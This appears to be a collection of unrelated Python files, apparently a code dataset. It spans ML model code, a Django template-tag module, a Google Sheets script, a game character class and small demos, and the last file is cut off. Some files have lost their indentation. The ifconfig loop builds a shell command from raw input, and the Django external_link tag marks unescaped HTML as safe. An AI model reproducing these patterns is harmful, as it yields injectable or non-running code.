|
python
|
import numpy as np
import multiprocessing
import xgboost as xgb # requires xgboost package, installed e.g. via 'pip install xgboost'
class XGBoost:
    """Gradient-boosted-tree baseline wrapping `xgboost.train`.

    Adapts the project's loader/args interface: both data splits are pulled
    eagerly into DMatrix form, the objective and eval metric are derived
    from `args`, and results are reported as (loss, error, rmse, mae).
    """

    def __init__(self, train_loader, val_loader, x_shape, dim_out, args):
        """Configure objective/eval metric and materialize the datasets.

        train_loader/val_loader must expose numpy_data() -> (x, y);
        x_shape is accepted for interface parity but unused (inputs are
        flattened below); dim_out is the number of classes/targets.
        """
        self.args = args
        self.dim_out = dim_out
        if args.regression:
            # NOTE(review): 'reg:linear' is the deprecated alias of
            # 'reg:squarederror' in newer xgboost releases — confirm the
            # pinned xgboost version still accepts it.
            objective = 'reg:linear'
            eval_metric = 'rmse'
            if args.criterion in {'mae', 'l1'}:
                eval_metric = 'mae'
            elif args.criterion not in {None, 'auto', 'rmse'}:
                raise Exception('Unknown eval_metric={}. For regression, use auto (rmse) | mae (l1).'.format(
                    args.criterion))
        else:
            if self.dim_out > 2:
                objective = 'multi:softmax'  # out 1 vector of classes
                if args.criterion in {None, 'auto', 'error', 'merror'}:
                    eval_metric = 'merror'
                elif args.criterion in {'logloss', 'nll'}:
                    eval_metric = 'mlogloss'
                else:
                    raise Exception('eval_metric={} is not supported for multi-classes classification. '
                                    'Use auto (merror) | logloss (nll)'.format(args.criterion))
            else:
                objective = 'binary:hinge'  # 'binary:logistic' # logistic -> predict outputs probability, not class
                if args.criterion in {None, 'auto', 'error', 'merror'}:
                    eval_metric = 'error'
                elif args.criterion in {'logloss', 'nll'}:  # auc somehow only works with 2 classes
                    eval_metric = 'logloss'
                elif args.criterion == 'auc':  # auc somehow only works with 2 classes
                    eval_metric = 'auc'
                else:
                    raise Exception('eval_metric={} is not supported for 2-class classification. '
                                    'Use auto (error) | logloss (nll) | auc'.format(args.criterion))
        # Materialize both splits as flat (n_samples, n_features) arrays.
        self.x_train, self.y_train = train_loader.numpy_data()
        self.x_val, self.y_val = val_loader.numpy_data()
        if len(self.x_train.shape) > 2:
            self.x_train = self.x_train.reshape(self.x_train.shape[0], -1)
            self.x_val = self.x_val.reshape(self.x_val.shape[0], -1)
        self.dtrain = xgb.DMatrix(self.x_train, label=self.y_train)
        self.dval = xgb.DMatrix(self.x_val, label=self.y_val)
        # early_stopping <= 0 disables early stopping entirely.
        if args.early_stopping is not None and args.early_stopping <= 0:
            self.early_stopping = None
        else:
            self.early_stopping = args.early_stopping
        # Normalize args.n_workers in place: missing/None -> 1; values above
        # the CPU count are clamped; negative values are shorthand
        # (<= -300 -> a third of the CPUs, <= -200 -> half, other negatives
        # -> num_cpu + n_workers, floored at 1).
        num_cpu = multiprocessing.cpu_count()
        if not hasattr(args, 'n_workers') or args.n_workers is None:
            args.n_workers = 1
        elif args.n_workers > num_cpu:
            args.n_workers = num_cpu
            if args.verbose >= 3:
                print('args.n_workers is inefficiently large, changed it to num_cpu=' + str(num_cpu))
        elif args.n_workers <= -300:
            args.n_workers = max(1, num_cpu // 3)
        elif args.n_workers <= -200:
            args.n_workers = max(1, num_cpu // 2)
        elif args.n_workers < 0:
            args.n_workers = max(1, num_cpu + args.n_workers)
        self.params = {'objective': objective,
                       'eval_metric': eval_metric,
                       'seed': args.seed,
                       'max_depth': args.max_depth,
                       'eta': args.eta,
                       'min_child_weight': args.min_child_weight,
                       'gamma': args.gamma,
                       'subsample': args.subsample,
                       'colsample_bytree': args.colsample_bytree,
                       'lambda': args.reg_lambda,
                       'alpha': args.reg_alpha,
                       'scale_pos_weight': args.scale_pos_weight,
                       'nthread': args.n_workers}
        # Multi-class objectives additionally need the class count.
        if objective == 'multi:softmax' or objective == 'multi:softprob':
            self.params['num_class'] = dim_out
        self.result = {'n_estimators': 0}
        self.model = None
        if args.verbose >= 3:
            print('XGBOOST OPTIMIZER LOADED: ')

    def eval(self, x, y):
        """Return (loss, error, rmse, mae) of the trained model on (x, y).

        For regression, error stays inf; for classification, rmse/mae stay
        inf. NOTE(review): that means `loss` is inf for classification (it
        is picked from rmse/mae) — looks intentional since only `error` is
        reported there, but confirm.
        """
        pred = self.predict(x)
        rmse = mae = error = float('inf')
        if self.args.regression:
            rmse = np.sqrt(np.sum((pred - y)**2) / y.shape[0]).item()
            mae = (np.sum(np.abs(pred - y)) / y.shape[0]).item()
        else:
            if self.params['objective'] == 'binary:logistic':  # pred is probability, not class
                pred[pred >= 0.5] = 1
                pred[pred < 0.5] = 0
            pred = pred.astype(int)
            correct = np.sum(pred == y).item()
            error = 1.0 - float(correct) / y.shape[0]
        loss = rmse if self.params['eval_metric'] == 'rmse' else mae
        return loss, error, rmse, mae

    def train(self):
        """Fit with optional early stopping on the validation split, then report."""
        eval_list = [(self.dtrain, 'train'), (self.dval, 'valdt')]  # last in the list is used for early stopping
        # verbose >= 5: log every round; verbose <= 3: silent; verbose == 4:
        # log roughly 10 times over the whole run.
        if self.args.verbose >= 5:
            verbose_eval = True
        elif self.args.verbose <= 3:
            verbose_eval = False
        else:
            verbose_eval = self.args.n_estimators // 10  # output only 10 evaluation info
        self.model = xgb.train(self.params, self.dtrain, self.args.n_estimators, eval_list,
                               verbose_eval=verbose_eval, early_stopping_rounds=self.early_stopping)
        tr_loss, tr_error, tr_rmse, tr_mae = self.eval(self.x_train, self.y_train)
        vl_loss, vl_error, vl_rmse, vl_mae = self.eval(self.x_val, self.y_val)
        # NOTE(review): best_ntree_limit belongs to the pre-2.0 xgboost API
        # (removed in 2.0 in favour of best_iteration) — confirm the pinned
        # version.
        self.result = {'train_loss': tr_loss, 'train_error': tr_error, 'train_rmse': tr_rmse, 'train_mae': tr_mae,
                       'val_loss': vl_loss, 'val_error': vl_error, 'val_rmse': vl_rmse, 'val_mae': vl_mae,
                       'n_estimators': self.model.best_ntree_limit}
        if self.args.verbose >= 3:
            if self.args.regression and not self.args.dataset.endswith("_r"):
                print('TRAIN RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(tr_loss, tr_rmse, tr_mae))
                print('VALDT RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(vl_loss, vl_rmse, vl_mae))
            else:
                print('TRAIN RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
                    tr_loss, 100. * tr_error, 100. * (1 - tr_error)))
                print('VALDT RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
                    vl_loss, 100. * vl_error, 100. * (1 - vl_error)))

    def test(self, dataloader):
        """Evaluate on a held-out loader; returns (loss, error, rmse, mae)."""
        x_test, y_test = dataloader.numpy_data()
        if len(x_test.shape) > 2:
            x_test = x_test.reshape(x_test.shape[0], -1)
        return self.eval(x_test, y_test)

    def predict(self, x):
        """Predict for raw feature array x using the best early-stopped trees."""
        assert self.model, 'model is not yet trained. Call train() first!'
        x = xgb.DMatrix(x)
        pred = self.model.predict(x, ntree_limit=self.model.best_ntree_limit)
        return pred

    @property
    def best_n_modules(self):
        # Number of trees actually kept after early stopping.
        return self.result['n_estimators']
|
python
|
import os
import time
# Ask the user which network interface to toggle in a loop.
eth_name = input('请输入要循环启用关闭的网卡名称:')
# Loop counter for the progress message.
i = 1
while True:
    # Bring the interface down.
    # NOTE(review): requires Linux `ifconfig` and root privileges;
    # os.popen neither waits for nor checks the command's result.
    os.popen('ifconfig ' + eth_name + ' down')
    print(eth_name + '网卡关闭了')
    # Sleep 5 seconds.
    time.sleep(5)
    # Bring the interface back up.
    os.popen('ifconfig ' + eth_name + ' up')
    print(eth_name + '网卡开启了')
    # Sleep 5 seconds.
    time.sleep(5)
    print('第' + str(i) + '次循环结束')
    i = i + 1
|
python
|
import wx
class Example(wx.Frame):
    """A fixed-size (400x200) frame positioned at (800, 250) on screen."""

    def __init__(self, parent, title):
        super(Example, self).__init__(parent, title=title, size=(400, 200))
        # Place the window at an explicit position instead of centring it.
        self.Move((800, 250))
def main():
    """Create the wx application, show the example frame, and run the loop."""
    app = wx.App()
    frame = Example(None, title='M2I & MQL - Moving Wind')
    frame.Show()
    app.MainLoop()


if __name__ == '__main__':
    main()
|
python
|
"""
This file defines common tags to use in templates
"""
from django import template
from django.contrib import messages
from django.template.defaultfilters import safe
register = template.Library()
@register.filter(name="make_spaces")
def make_spaces(in_string: str) -> str:
"""
This filter takes a string and replaces all dashes and underscores with spaces
:param in_string: The string to change
:type in_string: str
:returns: A string with no dashes or underscores
:rtype: str
"""
return in_string.replace("_", " ").replace("-", " ")
# Actions with destructive consequences get the "danger" link styling.
link_types = {
    'delete': 'link-danger',
    'abandon': 'link-danger',
    'cancel': 'link-danger',
}


@register.filter(name="link_class")
def get_link_class(action_name: str) -> str:
    """
    This filter gets what link class to use based off the action that it performs
    :param action_name: The name of the action
    :type action_name: str
    :returns: The link class that conveys what the action does
    :rtype: str
    """
    try:
        return link_types[action_name]
    except KeyError:
        # Anything not explicitly dangerous is styled as a primary link.
        return "link-primary"
# Map Django message levels (ints) to Bootstrap contextual-class suffixes.
level_classes = {
    messages.SUCCESS: "success",
    messages.ERROR: "danger",
    messages.DEBUG: "info",
    messages.INFO: "info",
    messages.WARNING: "warning",
}


@register.filter(name="alert_class")
def get_alert_class(message_level: int) -> str:
    """
    This filter gets an alert class for the specified message type
    :param message_level: The level of the message
    :type message_level: int
    :returns: The corresponding alert class to use
    :rtype: str
    """
    # BUG FIX: the annotation previously said `str`, but Django message
    # levels are integers (as the docstring and the dict keys already state).
    return f'alert-{level_classes.get(message_level, "info")}'
# Map Django message levels (ints) to Bootstrap icon names.
icon_classes = {
    messages.SUCCESS: "check-circle",
    messages.ERROR: "exclamation-circle",
    messages.DEBUG: "info-circle",
    messages.INFO: "info-circle",
    messages.WARNING: "exclamation-triangle",
}


@register.filter(name="icon_class")
def get_icon_class(message_level: int) -> str:
    """
    This filter gets an alert icon for the specified message type
    :param message_level: The level of the message
    :type message_level: int
    :returns: The corresponding alert icon to use
    :rtype: str
    """
    # BUG FIX: the annotation previously said `str`, but Django message
    # levels are integers (as the docstring and the dict keys already state).
    return f'bi bi-{icon_classes.get(message_level, "info-circle")}'
@register.simple_tag(name="external_link")
def external_link(href: str, display_text: str, classes: str = "") -> str:
"""
This tag will render an <a> element that will open in a new tab and be marked as external
:param href: The href of the link
:type href: str
:param display_text: The test to display in the <a> element
:type display_text: str
:param classes: Classes to add to the <a> element
:type classes: str
:returns: An <a> element in html that when clicked will open in a new tab
:rtype: str
"""
return safe(f'<a href="{href}" class="{classes}" target="_blank" rel="noopener">{display_text}</a>')
|
python
|
import json
from google.protobuf import json_format
from services.doubler.doubler_pb2 import Number
def build_request_from_dict(d, request):
    """Populate the protobuf message `request` from the plain dict `d`."""
    # Round-trip through JSON so json_format handles the field mapping.
    return json_format.Parse(json.dumps(d), request)
def build_request_from_file(filename, request):
    """Populate the protobuf message `request` from a JSON file."""
    with open(filename) as source:
        return json_format.Parse(source.read(), request)
def build_number_from_dict(d):
    # Convenience wrapper: parse a dict into a fresh Number message.
    return build_request_from_dict(d, Number())
def build_number_from_file(filename):
    # Convenience wrapper: parse a JSON file into a fresh Number message.
    return build_request_from_file(filename, Number())
|
python
|
from .convLSTM import StConvLSTM
from .GRU import StGRU
from .additive import StAdditive
from .LSTM import StLSTM
|
python
|
#!/usr/bin/env python
"""
Example of a telnet application that displays a dialog window.
"""
from __future__ import unicode_literals
from prompt_toolkit.contrib.telnet.server import TelnetServer
from prompt_toolkit.shortcuts.dialogs import yes_no_dialog
from prompt_toolkit.eventloop import From, get_event_loop
import logging
# Set up logging so the telnet server's INFO events are visible on stderr.
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
def interact(connection):
    """Telnet session entry point: show a yes/no dialog, report the answer.

    Written against prompt_toolkit 2.x: a generator-based coroutine driven
    by `From`/`yield` rather than async/await.
    """
    result = yield From(yes_no_dialog(
        title='Yes/no dialog demo', text='Press yes or no', async_=True))
    connection.send('You said: {}\n'.format(result))
    connection.send('Bye.\n')
def main():
    """Serve the telnet dialog demo on port 2323 until interrupted."""
    telnet_server = TelnetServer(interact=interact, port=2323)
    telnet_server.start()
    get_event_loop().run_forever()


if __name__ == '__main__':
    main()
|
python
|
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
def contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista):
    """Write the closed-orders report into the spreadsheet.

    Cell D2 receives the number of closed orders; cells A2, A3, ... receive
    one closed order per row. `creds` is kept for interface compatibility.

    FIX: the original rebuilt the Sheets service (and the spreadsheets()
    object) on every call and on every loop iteration even though a ready
    service is passed in; it is now reused and built once.
    """
    sheet = service.spreadsheets()
    # D2 <- how many orders are closed.
    sheet.values().update(
        spreadsheetId=SAMPLE_SPREADSHEET_ID,
        range="Página1!D2",
        valueInputOption="USER_ENTERED",
        body={'values': [[len(lista)]]},
    ).execute()
    # A2, A3, ... <- one closed order per row.
    for row, texto in enumerate(lista, start=2):
        sheet.values().update(
            spreadsheetId=SAMPLE_SPREADSHEET_ID,
            range="Página1!A%i" % row,
            valueInputOption="USER_ENTERED",
            body={'values': [[texto]]},
        ).execute()
def main(lista):
    """Authenticate against the Google Sheets API and publish `lista`.

    `lista` holds the closed orders to write. OAuth tokens are cached in
    token.pickle next to the script; credentials.json must exist for the
    first run (a browser window opens to complete the OAuth flow).
    """
    # If modifying these scopes, delete the file token.pickle.
    SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
    # Ask whether to reuse the default spreadsheet or accept a new ID
    # (prompts are in Portuguese).
    padrao_planilha = input("deseja usar a mesma planilha. y ou digite qualquer coisa\n").lower()
    if padrao_planilha == "y":
        SAMPLE_SPREADSHEET_ID = '1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563'
    else:
        SAMPLE_SPREADSHEET_ID = input("INSERIR A PARTE DO URL DO GOOGLE SHEETS, EX: 1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563 \n")
    """Shows basic usage of the Sheets API.
    Prints values from a sample spreadsheet.
    """
    # Self-assignment kept from the original; it has no effect.
    lista = lista
    creds = None
    # The file token.pickle stores the user's access and refresh tokens, and is
    # created automatically when the authorization flow completes for the first
    # time.
    if os.path.exists('token.pickle'):
        with open('token.pickle', 'rb') as token:
            creds = pickle.load(token)
    # If there are no (valid) credentials available, let the user log in.
    if not creds or not creds.valid:
        if creds and creds.expired and creds.refresh_token:
            creds.refresh(Request())
        else:
            flow = InstalledAppFlow.from_client_secrets_file(
                'credentials.json', SCOPES)
            creds = flow.run_local_server(port=0)
        # Save the credentials for the next run
        with open('token.pickle', 'wb') as token:
            pickle.dump(creds, token)
    service = build('sheets', 'v4', credentials=creds)
    contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista)
|
python
|
'''
Created on Jan 6, 2016
@author: T0157129
'''
import logging
import logging.config
from Items.PotionObject import PotionObject
class MyCharacter:
'''
This class represents a basic character.
Attributes:
int HP : represents the Health Points of the character.
If HP==0 the character is dead
dict equipment : represents the equipment of the character.
weapon : the character's active weaponObject
armor : the character's active armorObject
dict bag : represents the bag of the character. Here will be stored every found item.
HP_potion : the number of HP potions that the character owns.
<item_name> : any found itemObject.
Functions:
boolean isAlive()
'''
def __init__(self, HP, name, level):
'''
Constructor
'''
self.HPinit= HP
self.HP = HP
self.name = name
self.level= level
self.gold= 0
self.equipment= {}
self.equipment["weapon"]=None
self.equipment["armor"]=None
self.bag={}
'''
boolean isAlive()
Return true if HP > 0
'''
def isAlive(self):
return self.HP>0
########################################
# EQUIPMENT management
########################################
'''
void equipWeapon(weaponObject)
Equip the character with the weaponObject.
If a weapon is already equipped, the old one is added to the bag.
'''
def equipWeapon(self, weaponObject):
if weaponObject is not None:
actualWeapon= self.equipment["weapon"]
if actualWeapon is not None:
self.addToBag(actualWeapon)
self.equipment["weapon"]= weaponObject
# self.logger.info("Weapon equipped: %s" % weaponObject.name)
'''
void equipArmor(armorObject)
Equip the character with the armorObject.
If an armor is already equipped, the old one is added to the bag.
'''
def equipArmor(self, armorObject):
if armorObject is not None:
actualArmor = self.getArmor()
if actualArmor is not None:
self.addToBag(actualArmor)
self.equipment["armor"]= armorObject
# self.logger.info("Armor equipped: %s" % armorObject.name)
'''
weaponObject getWeapon()
Return the equipped weapon.
Can be None
'''
def getWeapon(self):
    # NOTE(review): despite the "getter" name this also UNEQUIPS the weapon
    # (the slot is cleared before returning). attack() reads the slot
    # directly, so calling getWeapon before a fight would disarm the
    # character — confirm this removal is intentional before changing.
    weapon = self.equipment["weapon"]
    self.equipment["weapon"] = None
    return weapon
'''
armorObject getArmor()
Return the equipped armor.
Can be None
'''
def getArmor(self):
    # NOTE(review): like getWeapon, this also UNEQUIPS the armor (slot is
    # cleared before returning). equipArmor relies on this exact behaviour;
    # defend() reads the slot directly — confirm before changing.
    armor = self.equipment["armor"]
    self.equipment["armor"] = None
    return armor
########################################
# BAG management
########################################
'''
void listInventory()
Print the content of the character's bag
'''
def listInventory(self):
print( '-- INVENTORY OF %s CONTAINS:' % self.name)
for itemName in self.bag.keys():
print (" |%s" % self.bag[itemName])
'''
void addToBag(itemObject)
Add itemObject to the bag.
The key for this object is the itemObject.name
'''
def addToBag(self, itemObject):
self.bag[itemObject.name()]= itemObject
print("Item put in bag: %s" % itemObject.name())
'''
itemObject getFromBag(itemName)
Get the object named "itemName" from the bag.
If there is no itemObject named like this in the bag, return None.
'''
def getFromBag(self, itemName):
return self.bag[itemName]
'''
itemObject takeFromBag(itemName)
Get the object named "itemName" from the bag.
The object is no longer in the bag.
If there is no itemObject named like this in the bag, return None.
'''
def takeFromBag(self, itemName):
return self.bag.pop(itemName)
def removeFromBag(self, itemName):
self.bag.pop(itemName)
'''
void useFromBag(itemName)
If an item with this name is found, call its use function.
'''
    def useFromBag(self, itemName):
        # Use the item called itemName from the bag, if present and usable.
        # Non-potion items are removed from the bag before use; potions stay.
        item= self.bag.get(itemName)
        if item is not None:
            # NOTE(review): item.get('usable') is a dict-style lookup, but
            # elsewhere (addToBag, item.use below) bag entries are treated as
            # objects with methods -- confirm bag values really support .get(),
            # otherwise this line raises AttributeError.
            if item.get('usable') is None:
                print('Not usable')
                return
            else:
                #If it's not a potion we remove the object from the bag
                if not isinstance(item, PotionObject):
                    item= self.takeFromBag(itemName)
            # item can be None here if takeFromBag found nothing.
            if item is None:
                print("No such object in the bag.")
            else:
                item.use(self)
        else:
            # No item with this name in the bag.
            print("none obj")
########################################
# FIGHT management
########################################
'''
void defend(damagePoints)
    The character loses HP depending on their armor and damagePoints.
'''
def defend(self, damagePoints):
armor= self.equipment["armor"]
if armor != None:
m_damagePoints = damagePoints - armor.defensePoints()
if m_damagePoints < 0:
m_damagePoints=0
else:
m_damagePoints = damagePoints
self.HP = self.HP - m_damagePoints
print("%s has lost %d HP..." % (self.name,m_damagePoints))
'''
void attack(characterObject)
The character attacks characterObject.
If the character has no weapon, do nothing.
'''
def attack(self, characterObject):
weapon = self.equipment["weapon"]
if weapon != None:
print("%s attacks." % self.name)
characterObject.defend(weapon.attackPoints())
else:
print("%s can't attack, no weapon..." % self.name)
########################################
# Other functions
########################################
'''
unitsUsed fillHP(units)
Refill HP bar with units points.
Return the number of units recovered.
(Can be: 0 if HP == HPinit
or units
or the difference between HP and HPinit if HP+units > HPinit)
'''
def fillHP(self, units):
unitsUsed= 0
if self.HP < self.HPinit:
#Restore HP
if self.HP + units >= self.HPinit:
unitsUsed= self.HPinit - self.HP
else:
unitsUsed= units
self.HP= self.HP + unitsUsed
print("%s recovered %d HP." % (self.name, unitsUsed))
else:
print("%s HP already full." % self.name)
return unitsUsed
|
python
|
# Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
class Solution(object):
    """Merge-intervals solution."""

    def merge(self, intervals):
        """Merge overlapping intervals, mutating endpoints in place.

        :type intervals: List[Interval]
        :rtype: List[Interval]
        """
        merged = []
        for current in sorted(intervals, key=lambda iv: iv.start):
            if not merged or merged[-1].end < current.start:
                # Disjoint from everything merged so far: start a new group.
                merged.append(current)
            else:
                # Overlaps the last group: extend its right edge.
                merged[-1].end = max(merged[-1].end, current.end)
        return merged
|
python
|
from __future__ import division
import os,time,cv2
import scipy.io as sio
import tensorflow as tf
import tensorflow.contrib.slim as slim
import numpy as np
from numpy import *
import scipy.linalg
from copy import copy, deepcopy
def lrelu(x):
    """Leaky ReLU with slope 0.2 on the negative side."""
    return tf.maximum(0.2 * x, x)
def identity_initializer():
    """Return an initializer that produces identity-like conv kernels.

    The kernel is all zeros except for a 1 at the spatial centre for each
    matching (in, out) channel pair, so a 'SAME'-padded conv initialised
    with it starts out as an identity mapping on the shared channels.
    """
    def _initializer(shape, dtype=tf.float32, partition_info=None):
        array = np.zeros(shape, dtype=float)
        cx, cy = shape[0]//2, shape[1]//2  # spatial centre of the kernel
        for i in range(min(shape[2],shape[3])):
            array[cx, cy, i, i] = 1
        return tf.constant(array, dtype=dtype)
    return _initializer
def nm(x):
    """Adaptive normalization: learned blend of the raw input and its batch norm."""
    w0=tf.Variable(1.0,name='w0')  # weight on the identity path
    w1=tf.Variable(0.0,name='w1')  # weight on the batch-normalized path
    return w0*x+w1*slim.batch_norm(x)
# Per-channel mean (BGR/RGB order as stored in the VGG .mat file), shaped to
# broadcast over NHWC batches; subtracted from the input before VGG-19.
MEAN_VALUES = np.array([123.6800, 116.7790, 103.9390]).reshape((1,1,1,3))
def build_net(ntype,nin,nwb=None,name=None):
    """Build one VGG layer on top of `nin`.

    ntype 'conv': ReLU(conv2d with weights nwb[0] + bias nwb[1]), stride 1, SAME.
    ntype 'pool': 2x2 average pooling, stride 2, SAME.
    Returns None for any other ntype.
    """
    if ntype=='conv':
        return tf.nn.relu(tf.nn.conv2d(nin,nwb[0],strides=[1,1,1,1],padding='SAME',name=name)+nwb[1])
    elif ntype=='pool':
        return tf.nn.avg_pool(nin,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')
def get_weight_bias(vgg_layers,i):
    """Extract (weights, bias) constants for layer `i` of the MatConvNet
    VGG-19 structure loaded from the .mat file.

    The nested [i][0][0][2][0][...] indexing follows the MatConvNet cell
    layout -- presumably stable for this particular .mat release; verify
    against the file if it is swapped out.
    """
    weights=vgg_layers[i][0][0][2][0][0]
    weights=tf.constant(weights)
    bias=vgg_layers[i][0][0][2][0][1]
    bias=tf.constant(np.reshape(bias,(bias.size)))  # flatten to 1-D
    return weights,bias
def build_vgg19(input,reuse=False):
    """Build the VGG-19 feature extractor (conv1_1 .. conv5_2).

    Loads pretrained weights from 'Models/imagenet-vgg-verydeep-19.mat'
    (scipy.io is available via the `import scipy.io as sio` at file top),
    subtracts MEAN_VALUES from `input`, and returns a dict mapping layer
    names to tensors. conv5_3..pool5 are intentionally disabled below.
    """
    if reuse:
        # Share variables with a previously-built copy of this graph.
        tf.get_variable_scope().reuse_variables()
    net={}
    vgg_rawnet=scipy.io.loadmat('Models/imagenet-vgg-verydeep-19.mat')
    vgg_layers=vgg_rawnet['layers'][0]
    net['input']=input-MEAN_VALUES
    net['conv1_1']=build_net('conv',net['input'],get_weight_bias(vgg_layers,0),name='vgg_conv1_1')
    net['conv1_2']=build_net('conv',net['conv1_1'],get_weight_bias(vgg_layers,2),name='vgg_conv1_2')
    net['pool1']=build_net('pool',net['conv1_2'])
    net['conv2_1']=build_net('conv',net['pool1'],get_weight_bias(vgg_layers,5),name='vgg_conv2_1')
    net['conv2_2']=build_net('conv',net['conv2_1'],get_weight_bias(vgg_layers,7),name='vgg_conv2_2')
    net['pool2']=build_net('pool',net['conv2_2'])
    net['conv3_1']=build_net('conv',net['pool2'],get_weight_bias(vgg_layers,10),name='vgg_conv3_1')
    net['conv3_2']=build_net('conv',net['conv3_1'],get_weight_bias(vgg_layers,12),name='vgg_conv3_2')
    net['conv3_3']=build_net('conv',net['conv3_2'],get_weight_bias(vgg_layers,14),name='vgg_conv3_3')
    net['conv3_4']=build_net('conv',net['conv3_3'],get_weight_bias(vgg_layers,16),name='vgg_conv3_4')
    net['pool3']=build_net('pool',net['conv3_4'])
    net['conv4_1']=build_net('conv',net['pool3'],get_weight_bias(vgg_layers,19),name='vgg_conv4_1')
    net['conv4_2']=build_net('conv',net['conv4_1'],get_weight_bias(vgg_layers,21),name='vgg_conv4_2')
    net['conv4_3']=build_net('conv',net['conv4_2'],get_weight_bias(vgg_layers,23),name='vgg_conv4_3')
    net['conv4_4']=build_net('conv',net['conv4_3'],get_weight_bias(vgg_layers,25),name='vgg_conv4_4')
    net['pool4']=build_net('pool',net['conv4_4'])
    net['conv5_1']=build_net('conv',net['pool4'],get_weight_bias(vgg_layers,28),name='vgg_conv5_1')
    net['conv5_2']=build_net('conv',net['conv5_1'],get_weight_bias(vgg_layers,30),name='vgg_conv5_2')
    #net['conv5_3']=build_net('conv',net['conv5_2'],get_weight_bias(vgg_layers,32),name='vgg_conv5_3')
    #net['conv5_4']=build_net('conv',net['conv5_3'],get_weight_bias(vgg_layers,34),name='vgg_conv5_4')
    #net['pool5']=build_net('pool',net['conv5_4'])
    return net
def build(input,sz):
    """Build the prediction network.

    The RGB part of `input` is run through VGG-19; conv{1..5}_2 features are
    bilinearly resized to `sz` and concatenated onto `input`. A chain of
    dilated 3x3 convs (rates 1,2,4,...,128) follows, ending in a 6-channel
    1x1 conv squashed with tanh (one channel per output head).
    """
    vgg19_features=build_vgg19(input[:,:,:,0:3])
    for layer_id in range(1,6):
        vgg19_f = vgg19_features['conv%d_2'%layer_id]
        # Upsample each feature map back to the input resolution and stack it.
        input = tf.concat([input, tf.image.resize_bilinear(vgg19_f,sz)], axis=3)
    input = input/255.0
    net=slim.conv2d(input,64,[1,1],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv0')
    net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv1')
    net=slim.conv2d(net,64,[3,3],rate=2,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv2')
    net=slim.conv2d(net,64,[3,3],rate=4,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv3')
    net=slim.conv2d(net,64,[3,3],rate=8,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv4')
    net=slim.conv2d(net,64,[3,3],rate=16,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv5')
    net=slim.conv2d(net,64,[3,3],rate=32,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv6')
    net=slim.conv2d(net,64,[3,3],rate=64,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv7')
    net=slim.conv2d(net,64,[3,3],rate=128,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv8')
    net=slim.conv2d(net,64,[3,3],rate=1,activation_fn=lrelu,normalizer_fn=nm,weights_initializer=identity_initializer(),scope='g_conv9')
    net=slim.conv2d(net,6,[1,1],rate=1,activation_fn=None,scope='g_conv_last')
    return tf.tanh(net)
def prepare_data():
    """Read the training/validation image-name lists.

    Returns:
        (train_im_names, val_im_names): lists of stripped lines from
        ./train.txt and ./val.txt respectively.

    Fix: the original passed open(...) directly into a comprehension and
    never closed the handles; context managers close them deterministically.
    """
    with open('./train.txt') as train_file:
        train_im_names = [line.rstrip() for line in train_file]
    with open('./val.txt') as val_file:
        val_im_names = [line.rstrip() for line in val_file]
    return train_im_names, val_im_names
# ---- Session and graph construction (TF1-style static graph) ----
config=tf.ConfigProto()
config.gpu_options.allow_growth=True
sess=tf.Session(config=config)
im_path = "./img"
seg_path = "./inst"
train_im_names,val_im_names = prepare_data()
# NOTE(review): `input` and `output` shadow Python builtins; kept as-is.
# input: RGB (3) + pos/neg click distance maps (2) + binary click maps (2) = 7 ch.
input=tf.placeholder(tf.float32,shape=[None,None,None,7])
output=tf.placeholder(tf.float32,shape=[None,None,None,1])
sz=tf.placeholder(tf.int32,shape=[2])
input_vgg=tf.placeholder(tf.float32,shape=[None,None,None,3])
network=build(input,sz)
vgg19_network=build_vgg19(input_vgg)
# L2 Loss
# One loss term per output head; the combined loss takes the best head plus a
# small weighted sum over all heads (weights halve from d1 to d6).
loss_d1=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss_d2=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss_d3=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,2],axis=3)-output))
loss_d4=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,3],axis=3)-output))
loss_d5=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,4],axis=3)-output))
loss_d6=tf.reduce_mean(tf.square(tf.expand_dims(network[:,:,:,5],axis=3)-output))
loss = tf.reduce_min([loss_d1, loss_d2, loss_d3, loss_d4, loss_d5, loss_d6]) + 0.0025*(32*loss_d1+16*loss_d2+8*loss_d3+4*loss_d4+2*loss_d5+1*loss_d6)
# L1 Loss
loss2_d1=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,0],axis=3)-output))
loss2_d2=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,1],axis=3)-output))
loss2_d3=tf.reduce_mean(tf.abs(tf.expand_dims(network[:,:,:,2],axis=3)-output))
